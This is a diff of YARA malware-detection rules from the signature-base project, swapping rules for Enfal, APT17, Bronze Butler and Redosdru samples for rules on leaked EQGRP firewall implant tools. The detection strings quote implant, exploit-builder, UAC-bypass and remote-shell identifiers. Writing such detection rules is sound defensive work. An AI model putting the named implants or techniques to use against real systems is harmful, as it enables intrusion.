 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8a22eeafa320bcf0d41de402223d3ad51d8625ffaa68fe24be864ffcf72a64a2"
+		logic_hash = "e7e1b206f9c51ffe0ab016a93d551a9ede8f87adfc38fe70278be8c2f0fe0696"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "23a24f99c3c6c00cd4bf6cb968f813ba2ceadfa846c7f169f412bcbb71ba6573"
-		hash2 = "35069905d9b7ba1fd57c8df03614f563504194e4684f47aafa08ebb8d9409d0b"
-		hash3 = "a28d107f168d85c38fc76229b14561b472e60e60973eb10b6b554c1f57469322"
-		hash4 = "ed93e28ca18f749a78678b1e8e8ac31f4c6c0bab2376d398b413dbdfd5af9c7f"
-		hash5 = "26f5aee1ce65158e8375deb63c27edabfc9f5de3c1c88a4ce26a7e50b315b6d8"
-		hash6 = "b25a515706085dbde0b98deaf647ef9a8700604652c60c6b706a2ff83fdcbf45"
+		hash1 = "c4567c00734dedf1c875ecbbd56c1561a1610bedb4621d9c8899acec57353d86"
 
 	strings:
-		$s1 = "bpayload.exe.manifest" fullword ascii
-		$s2 = "spayload" fullword ascii
+		$o1 = "Connection timed out. Only a problem if the callback was not received." fullword ascii
+		$o2 = "Could not reliably detect cookie. Using 'session_id'..." fullword ascii
+		$c1 = "def build_exploit_payload(self,cmd=\"/tmp/httpd\"):" fullword ascii
+		$c2 = "self.build_exploit_payload(cmd)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Enfal_Nov22 : FILE
+rule SIGNATURE_BASE_EQGRP_BUSURPER_2211_724
 {
 	meta:
-		description = "Detects a certain type of Enfal Malware"
+		description = "EQGRP Toolset Firewall - file BUSURPER-2211-724.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9dcba14e-2175-5da0-8629-5b952c213f6c"
-		date = "2015-02-10"
-		modified = "2023-01-06"
-		old_rule_name = "Enfal_Malware"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_enfal.yar#L1-L25"
+		id = "d109210e-14df-5b90-a496-fa8a2454126b"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L350-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bf349ba2b7bd635808b4ee23c6286e7dd403fbc185c6b59f0bb1fbf47ba7d9bb"
+		logic_hash = "834180ef512882cc3b22e79a6bda349678eb5042a3356a50c47eeb36ae453427"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		hash2 = "42fa6241ab94c73c7ab386d600fae70da505d752daab2e61819a0142b531078a"
-		hash2 = "bf433f4264fa3f15f320b35e773e18ebfe94465d864d3f4b2a963c3e5efd39c2"
+		quality = 83
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d809d6ff23a9eee53d2132d2c13a9ac5d0cb3037c60e229373fc59a4f14bc744"
 
 	strings:
-		$xop1 = { 00 00 83 c9 ff 33 c0 f2 ae f7 d1 49 b8 ff 8f 01 00 2b c1 }
-		$s1 = "POWERPNT.exe" fullword ascii
-		$s2 = "%APPDATA%\\Microsoft\\Windows\\" ascii
-		$s3 = "%HOMEPATH%" fullword ascii
-		$s4 = "Server2008" fullword ascii
-		$s5 = "%ComSpec%" fullword ascii
+		$s1 = ".got_loader" fullword ascii
+		$s2 = "_start_text" ascii
+		$s3 = "IMPLANT" fullword ascii
+		$s4 = "KEEPGOING" fullword ascii
+		$s5 = "upgrade_implant" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 3 of ( $s* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Enfal_Malware_Backdoor : FILE
+rule SIGNATURE_BASE_EQGRP_Networkprofiler_Orderscans
 {
 	meta:
-		description = "Generic Rule to detect the Enfal Malware"
+		description = "EQGRP Toolset Firewall - file networkProfiler_orderScans.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4631888c-e1e2-5969-a312-0f0011cd605c"
-		date = "2015-02-10"
+		id = "2d48df0c-f950-5bb6-8d3e-77c2f970eb57"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_enfal.yar#L27-L57"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L369-L383"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ce0c19e666cc0db50194bd56f51beddeee22c787b67810655241fdd4d34a31e"
-		score = 60
+		logic_hash = "0cdf4f3d8f668ce5d5aab652c83cb4d2a9acc3471ff720448d021707b34402ef"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "6d484daba3927fc0744b1bbd7981a56ebef95790"
-		hash1 = "d4071272cc1bf944e3867db299b3f5dce126f82b"
-		hash2 = "6c7c8b804cc76e2c208c6e3b6453cb134d01fa41"
+		hash1 = "ea986ddee09352f342ac160e805312e3a901e58d2beddf79cd421443ba8c9898"
 
 	strings:
-		$x1 = "Micorsoft Corportation" fullword wide
-		$x2 = "IM Monnitor Service" fullword wide
-		$s1 = "imemonsvc.dll" fullword wide
-		$s2 = "iphlpsvc.tmp" fullword
-		$z1 = "urlmon" fullword
-		$z2 = "Registered trademarks and service marks are the property of their respec" wide
-		$z3 = "XpsUnregisterServer" fullword
-		$z4 = "XpsRegisterServer" fullword
-		$z5 = "{53A4988C-F91F-4054-9076-220AC5EC03F3}" fullword
+		$x1 = "Unable to save off predefinedScans directory" fullword ascii
+		$x2 = "Re-orders the networkProfiler scans so they show up in order in the LP" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( all of ( $s* ) and all of ( $z* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_APT17_Sample_FXSST_DLL : FILE
+rule SIGNATURE_BASE_EQGRP_Epicbanana_2_1_0_1
 {
 	meta:
-		description = "Detects Samples related to APT17 activity - file FXSST.DLL"
+		description = "EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4b9b25e-8895-5ba5-b706-bfb6892c16ae"
-		date = "2015-05-14"
+		id = "cc3346bd-0347-5cf3-b946-5c017d68d93e"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/ZiJyQv"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt17_malware.yar#L10-L36"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L385-L399"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
-		logic_hash = "51d6da6c3ec46dc9e991a6a36de6d79626f1859296cda65e9027951c13aa4cd5"
+		logic_hash = "be0b180e0dfdda35725ac6d9c35752a0b56bdbdaf985b6932c7d2ff342d4cde3"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4b13cc183c3aaa8af43ef3721e254b54296c8089a0cd545ee3b867419bb66f61"
 
 	strings:
-		$x1 = "Microsoft? Windows? Operating System" fullword wide
-		$x2 = "fxsst.dll" fullword ascii
-		$y1 = "DllRegisterServer" fullword ascii
-		$y2 = ".cSV" fullword ascii
-		$s1 = "GetLastActivePopup"
-		$s2 = "Sleep"
-		$s3 = "GetModuleFileName"
-		$s4 = "VirtualProtect"
-		$s5 = "HeapAlloc"
-		$s6 = "GetProcessHeap"
-		$s7 = "GetCommandLine"
+		$s1 = "failed to create version-specific payload" fullword ascii
+		$s2 = "(are you sure you did \"make [version]\" in versions?)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and ( all of ( $x* ) or all of ( $y* ) ) and all of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Daserf_Delphi_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Sniffer_Xml2Pcap
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		description = "EQGRP Toolset Firewall - file sniffer_xml2pcap"
 		author = "Florian Roth (Nextron Systems)"
-		id = "88372e62-3bba-58dc-825c-f35533e42825"
-		date = "2017-10-14"
+		id = "c284ac58-923c-5c34-b420-e87797915233"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L13-L36"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L401-L415"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6034a6746a5bd762d869ad2e791d80aca8a1251afa9386d6b657f23092c6fc42"
+		logic_hash = "3c3aa9f42edbca32725f8c02023e3b9644162a001ded099513d12f94d70dd4c8"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "89a80ca92600af64eb9c32cab4e936c7d675cf815424d72438973e2d6788ef64"
-		hash2 = "b1bd03cd12638f44d9ace271f65645e7f9b707f86e9bcf790e0e5a96b755556b"
-		hash3 = "22e1965154bdb91dd281f0e86c8be96bf1f9a1e5fe93c60a1d30b79c0c0f0d43"
+		hash1 = "f5e5d75cfcd86e5c94b0e6f21bbac886c7e540698b1556d88a83cc58165b8e42"
 
 	strings:
-		$s1 = "Services.exe" fullword ascii
-		$s2 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
-		$s3 = "l32.dll" fullword ascii
-		$s4 = "tProcess:" fullword ascii
-		$s5 = " InjectPr" ascii
-		$s6 = "Write$Error creating variant or safe array\x1fInvalid argument to time encode" fullword wide
-		$s7 = "on\\run /v " fullword ascii
-		$s8 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\run" fullword ascii
-		$s9 = "ms1ng2d3d2.exe" fullword ascii
+		$x1 = "-s/--srcip <sourceIP>  Use given source IP (if sniffer doesn't collect source IP)" fullword ascii
+		$x2 = "convert an XML file generated by the BLATSTING sniffer module into a pcap capture file." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		1 of them
 }
-
-rule SIGNATURE_BASE_Bronzebutler_Daserf_C_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Bananaaid
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		description = "EQGRP Toolset Firewall - file BananaAid"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62a5cc4a-7c58-5e4d-ac23-8d1f850a540a"
-		date = "2017-10-14"
+		id = "bdd3ce51-1809-5b2f-9c7e-6c0b056d022b"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L38-L78"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L417-L433"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0b0c05db41d6b6ac48b31d8c22aead301470f465c2840ddc98ed9577d0aaa50b"
+		logic_hash = "2ae52529547866dcfe66fffb3f5b37eba89844b7675129c66636ebef01b0f49a"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a4afd9df1b4cc014c3a89d7b4a560fa3e368b02286c42841762714b23e68cc05"
-		hash2 = "90ac1fb148ded4f46949a5fea4cd8c65d4ea9585046d66459328a5866f8198b2"
-		hash3 = "331ac0965b50958db49b7794cc819b2945d7b5e5e919c185d83e997e205f107b"
-		hash4 = "b1fdc6dc330e78a66757b77cc67a0e9931b777cd7af9f839911eecb74c04420a"
-		hash5 = "15abe7b1355cd35375de6dde57608f6d3481755fdc9e71d2bfc7c7288db4cd92"
-		hash6 = "85544d2bcaf8e6ca32bbc0a9e9583c9db1dce837043f555a7ff66363d5858439"
-		hash7 = "2dc24622c1e91642a21a64c0dd31cbe953e8f77bd3d6abcf2c4676c3b11bb162"
-		hash8 = "2bdb88fa24cffba240b60416835189c76a9920b6c3f6e09c3c4b171c2f57031c"
+		hash1 = "7a4fb825e63dc612de81bc83313acf5eccaa7285afc05941ac1fef199279519f"
 
 	strings:
-		$s1 = "(c) 2010 DYAMAR EnGineerinG, All rights reserved, http://www.dyamar.com." fullword ascii
-		$s2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1)" fullword ascii
-		$a1 = "ndkkwqgcm" fullword ascii
-		$a2 = "RtlGetCo" fullword ascii
-		$a3 = "hutils" fullword ascii
-		$b1 = "%USERPROFILE%\\System" fullword ascii
-		$b2 = "msid.dat" fullword ascii
-		$b3 = "DRIVE_REMOTE" fullword wide
-		$b4 = "%s%s%s%s%s%s%s%s%s%s%s%s" fullword ascii
-		$b5 = "jcbhe.asp" fullword ascii
-		$b6 = "edset.asp" fullword ascii
-		$b7 = "bxcve.asp" fullword ascii
-		$b8 = "hcvery.php" fullword ascii
-		$b9 = "ynhkef.php" fullword ascii
-		$b10 = "dkgwey.php" fullword ascii
+		$x1 = "(might have to delete key in ~/.ssh/known_hosts on linux box)" fullword ascii
+		$x2 = "scp BGLEE-" ascii
+		$x3 = "should be 4bfe94b1 for clean bootloader version 3.0; " fullword ascii
+		$x4 = "scp <configured implant> <username>@<IPaddr>:onfig" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "088382f4887e3b2c4bd5157f2d72b618" or all of ( $a* ) or 4 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Dget_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Bo : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		description = "EQGRP Toolset Firewall - file bo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d60fcc9f-0f17-5871-9e8e-71d26e2f46bc"
-		date = "2017-10-14"
+		id = "6aa71528-3ce6-5597-bb1a-e44cff3856d6"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L80-L93"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L435-L452"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d5537f581039fa4561950402a34cbd9abd54c167d659fbbe74f1cb83217e3fb"
+		logic_hash = "48c2d3f13283d2a1b7e1010c724f1e68e6002dd9a9779025dfc3a4952bec95bc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bd81521445639aaa5e3bcb5ece94f73feda3a91880a34a01f92639f8640251d6"
+		hash1 = "aa8b363073e8ae754b1836c30f440d7619890ded92fb5b97c73294b15d22441d"
 
 	strings:
-		$s2 = "DGet Tool Made by XZ" fullword ascii
+		$s1 = "ERROR: failed to open %s: %d" fullword ascii
+		$s2 = "__libc_start_main@@GLIBC_2.0" ascii
+		$s3 = "serial number: %s" fullword ascii
+		$s4 = "strerror@@GLIBC_2.0" fullword ascii
+		$s5 = "ERROR: mmap failed: %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 10KB and 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_Bronzebutler_Uacbypass_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Seconddate_2211 : FILE
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		description = "EQGRP Toolset Firewall - file SecondDate-2211.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "01853352-58fc-56a3-8c20-08405c71e251"
-		date = "2017-10-14"
+		id = "00951270-6189-58b6-8b64-422c4ab15ebe"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L95-L113"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L454-L470"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "64b70b9f5963be9009025c14a6e98be9642599af5226f77946b6255116fc22d8"
+		logic_hash = "f51f4cfb3b1c77f03a3627cccfee72e57731b26b01907cc837f246a8f7677580"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe06b99a0287e2b2d9f7faffbda3a4b328ecc05eab56a3e730cfc99de803b192"
+		hash1 = "2337d0c81474d03a02c404cada699cf1b86c3c248ea808d4045b86305daa2607"
 
 	strings:
-		$x1 = "\\Release\\BypassUacDll.pdb" ascii
-		$x2 = "%programfiles%internet exploreriexplore.exe" fullword wide
-		$x3 = "Elevation:Administrator!new:{3ad055" fullword wide
-		$x4 = "BypassUac.pdb" fullword ascii
-		$x5 = "[bypassUAC] started X64" fullword wide
-		$x6 = "[bypassUAC] started X86" fullword wide
+		$s1 = "SD_processControlPacket" fullword ascii
+		$s2 = "Encryption_rc4SetKey" fullword ascii
+		$s3 = ".got_loader" fullword ascii
+		$s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them )
+		( uint16( 0 ) == 0x457f and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Bronzebutler_Xxmm_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Config_Jp1_UA
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		description = "EQGRP Toolset Firewall - file config_jp1_UA.pl"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0e413e3a-fb61-58bc-9ecb-4ef76e83a7f3"
-		date = "2017-10-14"
+		id = "947e6f90-4eb4-5241-9819-677cee0c15d8"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L115-L140"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L472-L488"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eb9c12cbe2fe132a9588b744d10caee12716f622c31da8a1cee4c0f88d693e8e"
+		logic_hash = "8dd504bd00f72b1500375fbe451f5abb055cb2ff440f6ae4314b1e3d64097b83"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7197de18bc5a4c854334ff979f3e4dafa16f43d7bf91edfe46f03e6cc88f7b73"
+		hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56"
 
 	strings:
-		$x1 = "\\Release\\ReflectivLoader.pdb" ascii
-		$x3 = "\\Projects\\xxmm2\\Release\\" ascii
-		$x5 = "http://127.0.0.1/phptunnel.php" fullword ascii
-		$s1 = "xxmm2.exe" fullword ascii
-		$s2 = "\\AvUpdate.exe" wide
-		$s3 = "stdapi_fs_file_download" fullword ascii
-		$s4 = "stdapi_syncshell_open" fullword ascii
-		$s5 = "stdapi_execute_sleep" fullword ascii
-		$s6 = "stdapi_syncshell_kill" fullword ascii
+		$x1 = "This program will configure a JETPLOW Userarea file." fullword ascii
+		$x2 = "Error running config_implant." fullword ascii
+		$x3 = "NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " fullword ascii
+		$x4 = "First IP address for beacon destination [127.0.0.1]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 4 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Bronzebutler_Rarstar_1 : FILE
+rule SIGNATURE_BASE_EQGRP_Userscript
 {
 	meta:
-		description = "Detects malware / hacktool sample from Bronze Butler incident"
+		description = "EQGRP Toolset Firewall - file userscript.FW"
 		author = "Florian Roth (Nextron Systems)"
-		id = "770270b3-6743-5efb-84d8-b63f1df800d9"
-		date = "2017-10-14"
+		id = "c6c1b70e-437f-50e7-9055-b943a1a62e6c"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L142-L158"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L490-L503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0e418e595020d91c575051c3b1639b09efad150c625b62eec3d1331f9792641b"
+		logic_hash = "718ee434c8ae61e2709df6dd431dbb0a2230085f0132ae82c7ceda4de75248cf"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0fc1b4fdf0dc5373f98de8817da9380479606f775f5aa0b9b0e1a78d4b49e5f4"
+		hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7"
 
 	strings:
-		$s1 = "Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+6.0;+SV1)" fullword wide
-		$s2 = "http://www.google.co.jp" fullword wide
-		$s3 = "16D73E22-873D-D58E-4F42-E6055BC9825E" fullword ascii
-		$s4 = "\\*.rar" ascii
+		$x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Daserf_Nov1_Bronzebutler : FILE
+rule SIGNATURE_BASE_EQGRP_BBALL_M50FW08_2201 : FILE
 {
 	meta:
-		description = "Detects Daserf malware used by Bronze Butler"
+		description = "EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "58c4d3dc-c516-567b-8746-4e185c3cd328"
-		date = "2017-11-08"
+		id = "bced11a2-fac4-58e5-a4a8-1c6d5fe418f9"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/ffeCfd"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bronze_butler.yar#L170-L196"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L505-L523"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "75edc17c51f4ea82ff7722df2f5825721ff64445fb8c78b450f1333bd32b5829"
+		logic_hash = "dd180203ec4c4ddfa2c46cba672eb94179553637a9f7548b25dee7b88c3d3294"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5ede6f93f26ccd6de2f93c9bd0f834279df5f5cfe3457915fae24a3aec46961b"
+		hash1 = "80c0b68adb12bf3c15eff9db70a57ab999aad015da99c4417fdfd28156d8d3f7"
 
 	strings:
-		$x1 = "mstmp1845234.exe" fullword ascii
-		$x2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)" fullword ascii
-		$x3 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)" fullword ascii
-		$s1 = "Content-Type: */*" fullword ascii
-		$s2 = "ProxyEnable" ascii fullword
-		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" ascii fullword
-		$s4 = "iexplore.exe" ascii fullword
-		$s5 = "\\SOFTWARE\\Microsoft\\Windows\\Cu" ascii
-		$s6 = "rrentVersion\\Internet Settings" fullword ascii
-		$s7 = "ws\\CurrentVersion\\Inter" fullword ascii
-		$s8 = "Documents an" fullword ascii
+		$s1 = ".got_loader" fullword ascii
+		$s2 = "LOADED" fullword ascii
+		$s3 = "pageTable.c" fullword ascii
+		$s4 = "_start_text" ascii
+		$s5 = "handler_readBIOS" fullword ascii
+		$s6 = "KEEPGOING" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or 5 of them )
+		( uint16( 0 ) == 0x457f and filesize < 40KB and 5 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Backdoor_Redosdru_Jun17 : HIGHVOL FILE
+rule SIGNATURE_BASE_EQGRP_BUSURPER_3001_724 : FILE
 {
 	meta:
-		description = "Detects malware Redosdru - file systemHome.exe"
+		description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ea038142-6903-5d08-ac89-70c1bbef716c"
-		date = "2017-06-04"
+		id = "006877e9-1e73-5a27-8b3a-bca3513a2035"
+		date = "2016-08-16"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/OOB3mH"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eternalblue_non_wannacry.yar#L12-L36"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L525-L540"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "99218c4decf98f02eb75c3c41a56f857a07779c68d30c4d16ca605052c4f9c3e"
+		logic_hash = "531f7039290b386f070378cb4ba49a57b5031fb16b3972b61f4fb904770fc4ac"
 		score = 75
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309"
+		hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b"
 
 	strings:
-		$x1 = "%s\\%d.gho" fullword ascii
-		$x2 = "%s\\nt%s.dll" fullword ascii
-		$x3 = "baijinUPdate" fullword ascii
-		$s1 = "RegQueryValueEx(Svchost\\netsvcs)" fullword ascii
-		$s2 = "serviceone" fullword ascii
-		$s3 = "\x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#p \x1f#f \x1f#" fullword ascii
-		$s4 = "servicetwo" fullword ascii
-		$s5 = "UpdateCrc" fullword ascii
